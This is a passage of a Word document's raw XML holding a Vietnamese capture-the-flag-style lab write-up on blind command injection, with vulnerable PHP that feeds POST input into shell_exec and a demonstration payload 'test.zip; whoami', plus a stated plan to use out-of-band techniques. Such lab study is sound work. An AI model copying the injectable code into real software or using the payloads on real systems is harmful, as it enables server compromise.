          <w:p w14:paraId="3199A18F" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD7C6F5" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F8A74F" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23373062" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"backup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C1E014" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"timeout 3 zip /tmp/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1747D94D" w14:textId="5F5526E4" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/var/www/html/index.php 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A680D34" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> ($result !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> &amp;&amp; strpos($result, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"zip error"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">) === </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CF6081" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Backup thành công"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B5FBD2" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8A81A6" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Backup không thành công"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9CBFC2" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E753218" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// CHANGELOG: Bảo trì</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010F9A8A" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "ping":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EA84F1D" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 ping -c 4 $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29EFE11B" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729B9861" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "nslookup":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5631BDB1" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 nslookup $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D472443" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D470CEF" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "dig":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C80A8F" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 dig $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A49F2B5" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5318727A" w14:textId="77777777" w:rsidR="00E54E97" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3BE4AC" w14:textId="69328B57" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C08F86" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F1464F5" w14:textId="77777777" w:rsidR="00DB597E" w:rsidRDefault="00DB597E"/>
    <w:p w14:paraId="4037802C" w14:textId="37DE2845" w:rsidR="00336C1C" w:rsidRDefault="00336C1C" w:rsidP="00336C1C">
      <w:r w:rsidRPr="00336C1C">
        <w:t xml:space="preserve">Level 4 của bài lab này mở ra một hướng khai thác mới thông qua chức năng </w:t>
      </w:r>
      <w:r w:rsidRPr="00336C1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>backup</w:t>
      </w:r>
      <w:r w:rsidRPr="00336C1C">
        <w:t xml:space="preserve">, sử dụng lệnh zip để nén </w:t>
      </w:r>
      <w:r>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608230EF" w14:textId="6858189F" w:rsidR="00336C1C" w:rsidRPr="00336C1C" w:rsidRDefault="00336C1C" w:rsidP="00406249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336C1C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Biến $target được chèn trực tiếp vào lệnh shell mà </w:t>
      </w:r>
      <w:r w:rsidRPr="00406249">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>không có bất kỳ kiểm tra hay lọc nào</w:t>
      </w:r>
      <w:r w:rsidRPr="00336C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C3A94" w14:textId="77777777" w:rsidR="00336C1C" w:rsidRPr="00336C1C" w:rsidRDefault="00336C1C" w:rsidP="00336C1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336C1C">
        <w:t>Lệnh zip sẽ tạo file nén tại /tmp/$target chứa file index.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D804656" w14:textId="77777777" w:rsidR="00336C1C" w:rsidRPr="00336C1C" w:rsidRDefault="00336C1C" w:rsidP="00336C1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336C1C">
        <w:t>Nếu lệnh thực thi thành công (không chứa "zip error"), hệ thống trả về "Backup thành công".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2D33E8" w14:textId="392F4253" w:rsidR="00336C1C" w:rsidRPr="00336C1C" w:rsidRDefault="00406249" w:rsidP="00F51943">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở bài này ứng dụng </w:t>
      </w:r>
      <w:r w:rsidR="00F51943">
        <w:t xml:space="preserve">chỉ hiển thị kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00873F18">
        <w:t xml:space="preserve">thành công hay không </w:t>
      </w:r>
      <w:r w:rsidR="00F51943">
        <w:t>của việc thực thi câu lệnh cmd liên quan đến backup</w:t>
      </w:r>
      <w:r w:rsidR="00873F18">
        <w:t xml:space="preserve"> mà không hiển thị kết quả trả về trực tiếp từ câu lệnh lên việc chèn lệnh cmd vào và chờ mong nó hiển thị trên web là không khả thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70DDF2" w14:textId="77777777" w:rsidR="00873F18" w:rsidRPr="008566A5" w:rsidRDefault="00873F18" w:rsidP="00873F18">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D8560B" w14:textId="2A1D9BC3" w:rsidR="00873F18" w:rsidRPr="004E45DE" w:rsidRDefault="00F63D8E" w:rsidP="004E45DE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F63D8E">
        <w:t xml:space="preserve">Trong trường hợp ứng dụng tồn tại lỗ hổng Command Injection nhưng không hiển thị kết quả lệnh (blind), việc xác định lệnh có thực thi hay không trở nên khó khăn. Để giải quyết vấn đề này, </w:t>
      </w:r>
      <w:r>
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63D8E">
        <w:t xml:space="preserve"> sử dụng kỹ thuật Out-of-Band (OAST), cho phép tạo ra một tương tác gián tiếp giữa hệ thống mục tiêu và một máy chủ bên ngoài do </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mình </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63D8E">
        <w:t>kiểm soát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69ACE6" w14:textId="77777777" w:rsidR="00873F18" w:rsidRPr="00184ED1" w:rsidRDefault="00873F18" w:rsidP="00873F18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033281AE" w14:textId="7955FA75" w:rsidR="00D028AA" w:rsidRPr="00D028AA" w:rsidRDefault="00EE1C5B" w:rsidP="00D028AA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trước </w:t>
      </w:r>
      <w:r w:rsidR="00D028AA">
        <w:t xml:space="preserve">tiên, </w:t>
      </w:r>
      <w:r w:rsidR="00D028AA" w:rsidRPr="00D028AA">
        <w:t xml:space="preserve"> thử cung cấp một giá trị hợp lệ là test.zip vào trường đầu vào của chức năng backup. Đây là một chuỗi đơn giản, không chứa ký tự đặc biệt hoặc cú pháp shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947417D" w14:textId="77777777" w:rsidR="00B41EC0" w:rsidRPr="00B41EC0" w:rsidRDefault="00B41EC0" w:rsidP="00B41EC0">
      <w:r w:rsidRPr="00B41EC0">
        <w:t>Lệnh thực thi phía server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7FDBB" w14:textId="77777777" w:rsidR="00B41EC0" w:rsidRPr="00B41EC0" w:rsidRDefault="00B41EC0" w:rsidP="00B41EC0">
      <w:r w:rsidRPr="00B41EC0">
        <w:t xml:space="preserve">timeout 3 zip /tmp/test.zip -r /var/www/html/index.php 2&gt;&amp;1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BDA494" w14:textId="77777777" w:rsidR="00B41EC0" w:rsidRPr="00B41EC0" w:rsidRDefault="00B41EC0" w:rsidP="00B41EC0">
      <w:r w:rsidRPr="00B41EC0">
        <w:t>→ Lệnh này sẽ tạo một file nén test.zip tại thư mục /tmp, chứa file index.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B2DCBF" w14:textId="7972C26C" w:rsidR="00944684" w:rsidRDefault="000A18FF">
      <w:r w:rsidRPr="000A18FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4299B520" wp14:editId="16BAEF30">
            <wp:extent cx="5731510" cy="1104265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1365769259" name="Picture 1"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69259" name="Picture 1" descr="A white rectangular object with a black line&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1104265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB40DF" w14:textId="13329BAB" w:rsidR="00B41EC0" w:rsidRPr="00B41EC0" w:rsidRDefault="00B41EC0" w:rsidP="00B41EC0">
      <w:r w:rsidRPr="00B41EC0">
        <w:t xml:space="preserve">Kết quả trả về từ ứng dụng </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cho thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41EC0">
        <w:t xml:space="preserve">Backup thành </w:t>
      </w:r>
      <w:r>
        <w:t>công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DA130D" w14:textId="06498003" w:rsidR="00776F32" w:rsidRPr="00776F32" w:rsidRDefault="00B41EC0" w:rsidP="00776F32">
      <w:r>
        <w:t xml:space="preserve">Tiếp đó thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00776F32" w:rsidRPr="00776F32">
        <w:t>thử nghiệm bằng cách chèn thêm cú pháp shell để kiểm tra khả năng thực thi lệnh hệ thống.</w:t>
      </w:r>
      <w:r w:rsidR="00776F32">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00776F32" w:rsidRPr="00776F32">
        <w:t>ử dụng payload:</w:t>
      </w:r>
      <w:r w:rsidR="00776F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00776F32" w:rsidRPr="00776F32">
        <w:t xml:space="preserve">test.zip; whoami </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19C638" w14:textId="77777777" w:rsidR="00776F32" w:rsidRPr="00776F32" w:rsidRDefault="00776F32" w:rsidP="00776F32">
      <w:r w:rsidRPr="00776F32">
        <w:t>→ Lệnh thực thi phía server trở thành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D62CC9" w14:textId="77777777" w:rsidR="00776F32" w:rsidRPr="00776F32" w:rsidRDefault="00776F32" w:rsidP="00776F32">
      <w:r w:rsidRPr="00776F32">
        <w:t xml:space="preserve">timeout 3 zip /tmp/test.zip; whoami -r /var/www/html/index.php 2&gt;&amp;1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6301B" w14:textId="77777777" w:rsidR="00304448" w:rsidRPr="00304448" w:rsidRDefault="00304448" w:rsidP="00304448">
      <w:r w:rsidRPr="00304448">
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA04F0E" w14:textId="77777777" w:rsidR="00304448" w:rsidRPr="00304448" w:rsidRDefault="00304448" w:rsidP="00304448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00304448">
        <w:t>zip /tmp/test.zip là lệnh gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70059E5B" w14:textId="77777777" w:rsidR="00304448" w:rsidRPr="00304448" w:rsidRDefault="00304448" w:rsidP="00304448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00304448">
        <w:t>; kết thúc lệnh hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298F3D5" w14:textId="77777777" w:rsidR="00304448" w:rsidRPr="00304448" w:rsidRDefault="00304448" w:rsidP="00304448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00304448">
        <w:t>whoami là lệnh được chèn thêm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532C6E04" w14:textId="650FBE75" w:rsidR="00776F32" w:rsidRPr="00B41EC0" w:rsidRDefault="00304448" w:rsidP="00304448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00304448">
        <w:t>-r /var/www/html/index.php bị tách khỏi lệnh zip, nhưng vẫn nằm trong dòng lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D02E8" w14:textId="0062F864" w:rsidR="009D66D9" w:rsidRDefault="009D66D9">
      <w:r w:rsidRPr="009D66D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDFBD03" wp14:editId="0F931611">
            <wp:extent cx="5731510" cy="1090930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="499284679"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84679" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1090930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
